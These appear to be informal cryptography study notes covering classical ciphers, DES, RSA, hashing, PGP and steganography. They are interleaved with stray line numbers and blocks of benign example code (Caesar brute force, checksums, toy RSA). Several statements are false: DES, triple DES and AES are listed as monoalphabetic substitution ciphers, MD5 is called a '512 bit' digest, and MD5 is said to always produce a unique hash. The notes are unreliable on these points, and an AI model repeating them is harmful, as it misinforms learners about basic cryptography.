cryptology --> cryptanalysis + cryptography
The science of making and breaking the algorithms

TERMINOLOGIES

Plain Text : A text which is created by and readable by the individuals only.
Cipher Text : It is the encrypted text, which is produced by applying an algorithm to the plain text.
Encryption : Process of converting plain text to cipher text.
Decryption : Process of converting cipher text to plain text.

Crypt: hidden / secret / vault
Graphy: writing
the art of converting PT into CT using an algorithm is cryptography
PT = plain text
CT = cipher text
algo = set of predefined rules / functions

cryptanalysis : the science of predicting the algorithm and breaking it.

plain text ---> algo + key -----> cipher
 ^^^^^ ------> decrypt ----> key + algo ---> PT
 ^^^^^ ------->cryptanalysis ------->PT

why Cryptography ?
provides :
 Non-Repudiation
 Confidentiality / Security
 Integrity
 Authentication
where ?
 emails
 chats
 PII - Personally Identifiable Information
 Credit Card No.
 Tax Info.
 Sensitive Info.

Cryptography types:
 symmetric
 asymmetric
 hashing


Classical Cipher Types:
 Transposition Cipher: letters are shifted and rearranged

 Rail Fence Cipher (keyless cipher), Row Transposition Cipher, combined, double transposition

 Substitution Cipher: letters are replaced with cipher text

 Polyalphabetic: multiple alphabetic substitution
 Playfair cipher, Vigenere Cipher, one-time pad (Vernam cipher), Hill cipher,
 Monoalphabetic:
 additive cipher, multiplicative cipher, affine cipher
 eg. ROT13, Caesar Cipher, DES, triple DES, AES
a 1
b 2
c 3
d 4
e 5
f 6
-
-
z 26

key = 2

abca (plain text) -----> key = 2 ------> cdec (cipher text)
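The additive (Caesar) cipher from the a=1 ... z=26 table above, as an added example (not from these notes), with the key=2 case and the cryptanalysis side: the key space is only 26 shifts, so a ciphertext can be broken by trying every key and looking for an expected word.

```python
"""Added example (not from these notes): the additive (Caesar) cipher from the
a=1 ... z=26 table above, with the key=2 example and the cryptanalysis side:
because the key space is just 26 shifts, a ciphertext can be decrypted by
trying every key, which is why such ciphers no longer protect anything."""
import string

LOWER = string.ascii_lowercase
UPPER = string.ascii_uppercase


def additive_encrypt(plaintext, key):
    """Shift each letter forward by key positions, wrapping z back to a."""
    out = []
    for ch in plaintext:
        if ch in LOWER:
            out.append(LOWER[(LOWER.index(ch) + key) % 26])
        elif ch in UPPER:
            out.append(UPPER[(UPPER.index(ch) + key) % 26])
        else:
            out.append(ch)            # spaces and punctuation pass through
    return "".join(out)


def additive_decrypt(ciphertext, key):
    return additive_encrypt(ciphertext, -key)


def brute_force(ciphertext):
    """Cryptanalysis without the key: every candidate plaintext, by key."""
    return {k: additive_decrypt(ciphertext, k) for k in range(26)}


def recover_key(ciphertext, known_word):
    """Return the first key whose decryption contains a word the analyst
    expects to see (a crib), or None if no shift produces it."""
    for k, candidate in brute_force(ciphertext).items():
        if known_word in candidate:
            return k
    return None


if __name__ == "__main__":
    ct = additive_encrypt("abca", 2)
    print("abca with key 2 ->", ct)                     # cdec
    print("key recovered from crib 'abca':", recover_key(ct, "abca"))
```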
1752
1753
1754
1755
1756
Ciphers based upon input type
 1. stream cipher: encrypts a continuous stream of data, basically bit by bit
 2. block cipher: encrypts blocks of data of fixed size

Ciphers based upon key

 Symmetric : Private key Enc.
 a single key is used to encrypt and decrypt.
 DES : Data Encryption Standard
 algorithm designed to encrypt 64-bit blocks of data
 >> the same key is used to encrypt all the blocks of data one by one
 >> takes input of a fixed 64-bit block length and gives 64-bit output
 >> DES uses a 56-bit key size : too small to protect data
 >> successors : triple DES

1772
Asymmetric Encryption
 each party has a key pair: a Public key and a Private (Pvt) key
Alice ==> Apub, Apvt
Bob ==> Bpub, Bpvt
alice --> PT --> Bpub -----------------CT-------------sent to Bob -------------CT-------------> Bpvt ---> PT ----> BOB

examples :
RSA
It was designed by Ron Rivest, Adi Shamir and Leonard Adleman in 1977
Key usually has a length of about 1000 to 4000 bits
for more technical info. http://www.crypto-it.net/eng/asymmetric/rsa.html?tab=3

 Differences
              Symmetric            | Asymmetric
Keys :        1 private key        | 2 keys: public and private
Speed :       fast                 | comparatively slow
Examples :    AES, DES, 3DES, RC4  | RSA, Diffie-Hellman, DSA

1798
Hashes
======
Hashing converts data into either an alphanumeric or a hexadecimal form. But there is a difference between cipher encryption and a hash: encrypted text can be reverted and decrypted,
but a hash cannot be reverted.
A hash function takes an input and returns a fixed-size alphanumeric string. The string is called the hash value. Examples: MD5 hash, SHA, etc.

EG. alphanumeric - scusege67dg367df7fd3fd37f3636d

MD5 Examples :

a    > 0cc175b9c0f1b6a831c399e269772661
aaaa > 594f803b380a41396ed63dca39503542

1812
HASHES FORMATS
================
A hashing algorithm is a one-way cryptographic function that accepts a message of any length as input and returns a fixed-length digest value as output.

1. MD5 (Message Digest 512 bit)
used as a checksum to verify data integrity,
designed by Professor Ronald Rivest of MIT (Rivest, 1992)

It converts the plain text into hexadecimal text of fixed length. It always creates a unique hash for the plain text, normally shown as its 32-digit hexadecimal equivalent: 128-bit output.

2. SHA1
Secure Hashing Algorithm
 takes an input and produces a 160-bit (20-byte) hash value known as a message digest, typically rendered as a hexadecimal number 40 digits long.
 now replaced with SHA-256 or SHA-3 -- 64 hex digits represent the 256-bit output

online checksum calculator : http://onlinemd5.com/

Using PowerShell to compute checksums:
shift + right click --> open PowerShell window here
> Get-FileHash .\filename.txt -Algorithm SHA256
other algorithms: -Algorithm MD5, -Algorithm SHA1

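The digest properties described above (fixed output length per algorithm, one-way, small input change gives a very different output) and the checksum check that Get-FileHash performs, as an added Python example that is not part of the original notes; the sample file contents are constructed here, and the "expected" checksum is computed from those same bytes.

```python
# Added example, not from the original notes: digests with hashlib and a file checksum check.
import hashlib
import hmac
import os
import tempfile

def digest_hex(data: bytes, algorithm: str) -> str:
    """Hex digest of `data` for 'md5', 'sha1' or 'sha256'."""
    return hashlib.new(algorithm, data).hexdigest()

def digest_lengths(data: bytes) -> dict:
    """Output length is fixed by the algorithm, not the input: 32 / 40 / 64 hex digits."""
    return {alg: len(digest_hex(data, alg)) for alg in ("md5", "sha1", "sha256")}

def changed_bits(a: bytes, b: bytes, algorithm: str = "sha256") -> int:
    """Number of digest bits that differ between two inputs (avalanche effect)."""
    x = int(digest_hex(a, algorithm), 16) ^ int(digest_hex(b, algorithm), 16)
    return bin(x).count("1")

def file_sha256(path: str) -> str:
    """Hash a file in chunks, like Get-FileHash -Algorithm SHA256 in the notes."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def verify_checksum(path: str, expected_hex: str) -> bool:
    """Constant-time compare so the check itself does not leak how many digits matched."""
    return hmac.compare_digest(file_sha256(path), expected_hex.strip().lower())

def demo() -> bool:
    # Constructed sample file; the "expected" value is computed from the same bytes.
    data = b"installer-1.0.bin contents (constructed sample)\n"
    with tempfile.NamedTemporaryFile(delete=False) as f:
        f.write(data)
        path = f.name
    try:
        good = verify_checksum(path, hashlib.sha256(data).hexdigest())
        tampered = verify_checksum(path, hashlib.sha256(data + b"x").hexdigest())
        return good and not tampered
    finally:
        os.unlink(path)
```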
1838
PGP : Pretty Good Privacy
provides cryptographic privacy and authentication for data communication.
PGP is used for
 signing,
 encrypting, and
 decrypting texts, e-mails, files
focused on increasing the security of e-mail communications.

How PGP works

Pretty Good Privacy uses a variation of the public key system. In this system, each user has an encryption key that is publicly known and a private key that is known only to that user.
You encrypt a message you send to someone else using their public key. When they receive it, they decrypt it using their private key.
Since encrypting an entire message with the public key can be time-consuming,
PGP uses a faster (symmetric) encryption algorithm to encrypt the message and then uses the recipient's public key to encrypt the shorter key that was used to encrypt the entire message.
Both the encrypted message and the encrypted short key are sent to the receiver, who first uses their own private key to decrypt the short key and then uses that key to decrypt the message.

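The Alice/Bob public-key flow from the asymmetric section and the PGP hybrid flow just described, as one added example that is not part of the original notes: a toy RSA key pair for Bob, a random session key that encrypts the message with a fast symmetric pass, and RSA applied only to that short key. The symmetric pass is a toy XOR keystream built from SHA-256 (my assumption for illustration, not PGP's real cipher), and the primes are tiny so the arithmetic can be followed by hand.

```python
# Added example, not from the original notes: toy RSA plus a PGP-style hybrid exchange.
import hashlib
import secrets

def rsa_keypair(p: int, q: int, e: int = 17):
    """Toy RSA: (public, private) = ((n, e), (n, d)) from two small primes."""
    n, phi = p * q, (p - 1) * (q - 1)
    d = pow(e, -1, phi)  # modular inverse of e (Python 3.8+)
    return (n, e), (n, d)

def rsa_encrypt(m: int, public) -> int:
    n, e = public
    return pow(m, e, n)

def rsa_decrypt(c: int, private) -> int:
    n, d = private
    return pow(c, d, n)

def keystream_xor(data: bytes, session_key: int) -> bytes:
    """Toy symmetric cipher (an assumption, not PGP's real one): XOR with SHA-256(key || counter)."""
    stream, counter = bytearray(), 0
    while len(stream) < len(data):
        stream += hashlib.sha256(session_key.to_bytes(4, "big") + counter.to_bytes(4, "big")).digest()
        counter += 1
    return bytes(b ^ k for b, k in zip(data, stream))  # the same call decrypts

def alice_sends(message: bytes, bob_public):
    """Alice: fresh session key -> fast symmetric pass over the message -> RSA on the short key only."""
    session_key = secrets.randbelow(bob_public[0] - 2) + 2  # 2 <= key < n so toy RSA can carry it
    return keystream_xor(message, session_key), rsa_encrypt(session_key, bob_public)

def bob_receives(ciphertext: bytes, wrapped_key: int, bob_private) -> bytes:
    """Bob: unwrap the session key with his private key, then decrypt the message with it."""
    return keystream_xor(ciphertext, rsa_decrypt(wrapped_key, bob_private))

def roundtrip(message: bytes) -> bytes:
    """Whole flow: alice --> PT --> Bpub ... CT ... --> Bpvt --> PT --> Bob."""
    bob_pub, bob_pvt = rsa_keypair(61, 53)  # toy primes, n = 3233; real keys are 1000+ bits
    ct, wrapped = alice_sends(message, bob_pub)
    return bob_receives(ct, wrapped, bob_pvt)
```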
Hushmail offers a web-based encrypted email service powered by OpenPGP
https://www.hushmail.com/

STEGANOGRAPHY
================
Steganography is a process in which we basically hide data inside other data. The data is hidden in plain sight, inside an image, audio or video file.
This process can also be used along with cryptography as an extra-secure method of protecting data.

Xiao Steganography tool:
https://download.cnet.com/Xiao-Steganography/3000-2092_4-10541494.html